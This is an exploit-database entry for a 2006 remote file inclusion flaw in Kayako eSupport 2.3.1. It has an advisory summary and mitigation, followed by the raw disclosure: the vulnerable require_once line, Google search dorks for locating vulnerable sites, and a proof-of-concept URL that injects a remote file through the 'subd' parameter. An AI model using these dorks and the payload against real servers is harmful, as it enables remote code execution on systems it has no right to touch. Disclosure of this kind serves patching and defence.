Kayako eSupport - exploit.company

vendor:

Kayako eSupport

by:

beford

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Kayako eSupport

Affected Version From: 2.3.1

Affected Version To: 2.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:kayako:kayako_esupport

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Kayako eSupport <= 2.3.1

Kayako eSupport version 2.3.1 and below is vulnerable to a Remote File Inclusion vulnerability. This vulnerability is due to the 'subd' parameter in the 'autoclose.php' script not being properly sanitized before being used in a 'require_once' call. This can be exploited to include arbitrary remote files by passing a URL in the 'subd' parameter. Successful exploitation requires that 'register_globals' is enabled.

Mitigation:

Disable 'register_globals' and ensure that all input is properly sanitized before being used in a 'require_once' call.

Source

Exploit-DB raw data:

Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

[code]
require_once $subd . "functions.php";
[/code]

Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?

# milw0rm.com [2006-08-02]